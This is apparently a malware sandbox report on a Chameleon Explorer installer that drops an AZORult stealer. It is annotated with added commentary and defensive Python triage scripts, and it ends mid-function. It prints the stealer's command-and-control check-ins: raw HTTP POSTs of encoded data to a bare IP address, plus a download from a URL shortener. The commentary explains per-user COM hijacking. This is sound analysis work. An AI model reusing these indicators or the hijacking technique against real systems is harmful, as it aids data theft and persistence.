Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: (the 37 lookups above, from the CLSID root through LocalServer, repeated verbatim a second time in the same order)
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
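The "Key opened" lines above are one COM activation: ChameleonFolder.exe asks for CLSID {0F87369F-A4E5-4CFC-BD3E-73E6154572DD} and COM walks the CLSID root, Elevation, TreatAs, InprocServer32, InprocHandler32, InprocHandler, LocalServer32 and LocalServer, consulting the per-user classes hive (HKEY_CURRENT_USER_Classes, which is HKCU\Software\Classes) before HKLM at every step. That order is what per-user COM hijacking relies on: a user-writable InprocServer32 or TreatAs under HKCU shadows the machine-wide registration without administrator rights. The report records the opens, not whether the HKCU keys existed. The Python below is an added example, not code from the Joe Sandbox report or from the Chameleon software: it reduces such lines to a per-CLSID summary, checks that the subkeys were consulted in the expected order, and lists the per-user paths worth inspecting on a live host. The sample lines are a constructed subset of those above; the field and function names are the example's own.

```python
"""Reduce Joe Sandbox "Key opened" lines for a COM activation to a per-CLSID
summary (hives in first-seen order, subkeys in first-seen order, WOW64 view)
and derive the per-user registry paths that would shadow the HKLM entries.

HKEY_CURRENT_USER_Classes is the per-user half of HKCR (HKCU\Software\Classes);
COM merges it over HKLM\Software\Classes, so a lookup that begins there is a
user-writable override point.  Added example; the sample is a constructed
subset of the report's lines and the naming below is this script's own.
"""
import re
from collections import OrderedDict

SAMPLE_LINES = [  # constructed subset of the report, in the order the report lists them
    r"Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}",
    r"Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}",
    r"Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation",
    r"Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation",
    r"Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs",
    r"Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs",
    r"Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32",
    r"Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32",
    r"Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32",
    r"Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32",
]

# Tolerates both the raw report form ("...exeKey opened:") and a "|"-separated form.
LINE_RE = re.compile(
    r"Source:\s*(?P<proc>.*?)\s*\|?\s*Key opened:\s*"
    r"(?P<hive>HKEY_[A-Za-z_]+)\\(?P<prefix>.*?)CLSID\\"
    r"(?P<clsid>\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\})"
    r"(?:\\(?P<subkey>[^\\]+))?\s*$"
)

# Order in which the trace consults the CLSID key and its subkeys: the key itself,
# the elevation moniker data, a TreatAs redirect, in-process server/handler, then
# the out-of-process server entries.
STANDARD_ORDER = ["(root)", "Elevation", "TreatAs", "InprocServer32",
                  "InprocHandler32", "InprocHandler", "LocalServer32", "LocalServer"]

# Subkeys whose default value names a binary or redirects to another CLSID: the
# entries that matter if a per-user copy exists.
SERVER_SUBKEYS = ("TreatAs", "InprocServer32", "LocalServer32")


def summarize(lines):
    """Group lookups by CLSID (upper-cased), keeping first-seen order of hives and subkeys."""
    out = OrderedDict()
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # not a registry line; other report rows are skipped
        clsid = m.group("clsid").upper()
        entry = out.setdefault(clsid, {"hives": [], "subkeys": [], "processes": set(), "wow64": False})
        hive = "HKCU" if m.group("hive").startswith("HKEY_CURRENT_USER") else "HKLM"
        if hive not in entry["hives"]:
            entry["hives"].append(hive)
        subkey = m.group("subkey") or "(root)"
        if subkey not in entry["subkeys"]:
            entry["subkeys"].append(subkey)
        entry["processes"].add(m.group("proc"))
        entry["wow64"] = entry["wow64"] or "WOW6432Node" in m.group("prefix")
    return out


def follows_standard_order(subkeys):
    """True if every subkey is a known one and they appear in STANDARD_ORDER sequence."""
    positions = [STANDARD_ORDER.index(s) for s in subkeys if s in STANDARD_ORDER]
    return len(positions) == len(subkeys) and positions == sorted(positions)


def user_override_points(summary):
    """Per-user paths consulted before HKLM for each CLSID whose lookup started in HKCU.
    If any of these exists on a host, it wins over the machine-wide registration."""
    points = []
    for clsid, entry in summary.items():
        if entry["hives"][:1] != ["HKCU"]:
            continue
        node = r"Software\Classes\WOW6432Node\CLSID" if entry["wow64"] else r"Software\Classes\CLSID"
        for subkey in entry["subkeys"]:
            if subkey in SERVER_SUBKEYS:
                points.append("\\".join(("HKCU", node, clsid, subkey)))
    return points


if __name__ == "__main__":
    for clsid, entry in summarize(SAMPLE_LINES).items():
        print(clsid, entry["hives"], entry["subkeys"], "wow64" if entry["wow64"] else "native",
              "standard order" if follows_standard_order(entry["subkeys"]) else "unusual order")
    for path in user_override_points(summarize(SAMPLE_LINES)):
        print("check:", path)
```

On a live host the printed paths are what to query (reg query or Get-ItemProperty on each); a default value present under HKCU for a CLSID that is registered machine-wide is the hijack to investigate.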
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Code function: 2_2_0355A504 FindFirstFileW,FindClose
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp | Code function: 2_2_03559F38 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Code function: 16_2_0295A504 FindFirstFileW
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Code function: 17_2_029DA504 FindFirstFileW
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Code function: 18_2_029AA504 FindFirstFileW
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Code function: 19_2_02A7A504 FindFirstFileW
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe | Code function: 20_2_03330280 FindFirstFileW,FindClose
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_004099C0 FreeLibrary,FindFirstFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,RemoveDirectoryW
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_00413030 FindFirstFileW,FindNextFileW,FindClose
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_004119A8 FindFirstFileW,FindNextFileW,FindClose
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_004119AC FindFirstFileW,FindNextFileW,FindClose
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_00412D6C FindFirstFileW,FindNextFileW,FindClose
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_0041160C FindFirstFileW,FindNextFileW,FindClose
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Code function: 22_2_02A1A504 FindFirstFileW
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | File opened: C:\Users\user\AppData\Roaming
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | File opened: C:\Users\user
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | File opened: C:\Users\user\AppData
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

                    Networking

                    Source: Network traffic | Suricata IDS: 2029465 - Severity 1 - ET MALWARE Win32/AZORult V3.2 Client Checkin M15 : 192.168.2.4:49854 -> 92.63.192.63:80
                    Source: Network traffic | Suricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.4:49854 -> 92.63.192.63:80
                    Source: Joe Sandbox View | IP Address: 104.21.79.229
                    Source: Joe Sandbox View | ASN Name: ITDELUXE-ASRU
                    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.79.229:443
                    Source: global traffic | HTTP traffic detected:
                        GET /1dHC37 HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                        Host: 2no.co
                    Source: global traffic | HTTP traffic detected:
                        POST /index.php HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                        Host: 92.63.192.63
                        Content-Length: 107
                        Cache-Control: no-cache
                        Data Raw: 4a 4c 89 28 39 ff 4c 2f fb 39 2f fb 39 4f ed 3f 4e ed 3e 3c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 28 39 f1 4c 2f fb 3a 2f fb 3a 2f fb 39 2f fb 35 48 ed 3f 4e ed 3e 33 ed 3e 3f ed 3e 3e ed 3e 39 ed 3e 38 8a 4f 2f fb 3a 4b
                        Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9LN>2><>=>2?N(9L/:/:/9/5H?N>3>?>>>9>8O/:K
                    Source: global traffic | HTTP traffic detected:
                        GET /index.html HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                        Host: 92.63.192.63
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected:
                        POST /index.php HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                        Host: 92.63.192.63
                        Content-Length: 6077
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /index.html HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                        Host: 92.63.192.63
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                    Source: unknown | TCP traffic detected without corresponding DNS query: 92.63.192.63 (40 connections)
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 occurrences)
                    Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_00417DA4 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle
                    Source: global traffic | HTTP traffic detected:
                        GET /1dHC37 HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                        Host: 2no.co
                    Source: global traffic | HTTP traffic detected:
                        GET /activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF206F2697DB14BB5EE90B3A8D-DEE4D6E40AA7315F07804DDD9503F87B-E102E85C5423062DBFF8920ECFD0E53F-453A430160CEF13230B9413C30A336AE-BDBEC76D9EE81A8CBE827F8B10FCC2A4&vrs=3.0.0.505&prg=explorer&uid=5153dce68ee7dc529e3ee1aac6d1b34a HTTP/1.1
                        User-Agent: Chameleon Checker NextGen2 (Ver: 3.0.0.505)
                        Host: neosoft-activator.appspot.com
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /static/?category=install&action=install&label=paid&uid=&prg=explorer HTTP/1.1
                        User-Agent: Chameleon Static (Ver: 3.0.0.505)
                        Host: www.chameleon-managers.com
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /info/versions/ HTTP/1.1
                        User-Agent: Chameleon checker ( Ver: 3.0.0.505)
                        Host: www.chameleon-managers.com
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /index.html HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                        Host: 92.63.192.63
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected:
                        GET /index.html HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                        Host: 92.63.192.63
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                    Source: global traffic | DNS traffic detected: DNS query: 2no.co
                    Source: global traffic | DNS traffic detected: DNS query: www.chameleon-managers.com
                    Source: global traffic | DNS traffic detected: DNS query: neosoft-activator.appspot.com
                    Source: unknown | HTTP traffic detected:
                        POST /index.php HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                        Host: 92.63.192.63
                        Content-Length: 107
                        Cache-Control: no-cache
                        Data Raw: 4a 4c 89 28 39 ff 4c 2f fb 39 2f fb 39 4f ed 3f 4e ed 3e 3c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 28 39 f1 4c 2f fb 3a 2f fb 3a 2f fb 39 2f fb 35 48 ed 3f 4e ed 3e 33 ed 3e 3f ed 3e 3e ed 3e 39 ed 3e 38 8a 4f 2f fb 3a 4b
                        Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9LN>2><>=>2?N(9L/:/:/9/5H?N>3>?>>>9>8O/:K
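The Suricata alerts and the HTTP lines above describe the check-in that separates the stealer from the Chameleon installer it rides in: POSTs to a bare IP address (92.63.192.63, for which no DNS query was ever made) with a User-Agent claiming IE 6.0b on Windows NT 5.1 (Windows XP), Cache-Control: no-cache, and an opaque 107-byte body with no Content-Type, whereas the Chameleon and 2no.co requests go to names the sandbox resolved. The Python below is an added example, not code from the Joe Sandbox report or from any of the software involved: it parses the requests as constructed from the lines above, flags those traits, and profiles the POST body copied from the report's Data Raw field. The indicator names are the example's own. The body profile shows that every third byte has its high bit set while the other two columns stay inside a narrow ASCII range; that is what a short repeating-key XOR over text looks like, and the example measures it rather than recovering a key.

```python
"""Triage of the HTTP requests captured in this report: flag the traits of a
hard-coded check-in and profile the opaque POST body without assuming anything
about its encoding.  Added example; REQUESTS and DNS_QUERIES are constructed
from the report's lines, POST_BODY is the report's Data Raw field."""
import ipaddress
import re

# Hosts that appear in the report's "DNS query" lines (constructed from the report).
DNS_QUERIES = {"2no.co", "www.chameleon-managers.com", "neosoft-activator.appspot.com"}

# Four of the report's requests, headers rejoined with CRLF (constructed from the report).
REQUESTS = [
    "GET /1dHC37 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: 2no.co\r\n\r\n",
    "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\n"
    "Host: 92.63.192.63\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\n"
    "Host: 92.63.192.63\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /info/versions/ HTTP/1.1\r\nUser-Agent: Chameleon checker ( Ver: 3.0.0.505)\r\n"
    "Host: www.chameleon-managers.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
]

# The 107-byte body of the first POST to 92.63.192.63, as printed in the report.
POST_BODY = bytes.fromhex(
    "4a 4c 89 28 39 ff 4c 2f fb 39 2f fb 39 4f ed 3f 4e ed 3e 3c ed 3e 33 ed 3e 3e ed 3e 3b "
    "ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d "
    "ed 3e 32 ed 3f 4e 8e 28 39 f1 4c 2f fb 3a 2f fb 3a 2f fb 39 2f fb 35 48 ed 3f 4e ed 3e 33 "
    "ed 3e 3f ed 3e 3e ed 3e 39 ed 3e 38 8a 4f 2f fb 3a 4b"
)

# IE 6.0 beta on Windows XP: a User-Agent no current client sends.
LEGACY_UA = re.compile(r"MSIE 6\.0b;.*Windows NT 5\.1")


def parse_request(raw):
    """Split an HTTP/1.x request head into method, path and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def is_ip_literal(host):
    """True for a Host header that is an IPv4/IPv6 address (an optional :port is stripped)."""
    try:
        ipaddress.ip_address(host.split(":")[0] if host.count(":") == 1 else host)
        return True
    except ValueError:
        return False


def beacon_indicators(raw, dns_queries=DNS_QUERIES):
    """Check-in traits present in one request, in a fixed order (empty list = nothing odd)."""
    req = parse_request(raw)
    h = req["headers"]
    host = h.get("host", "")
    hits = []
    if is_ip_literal(host):
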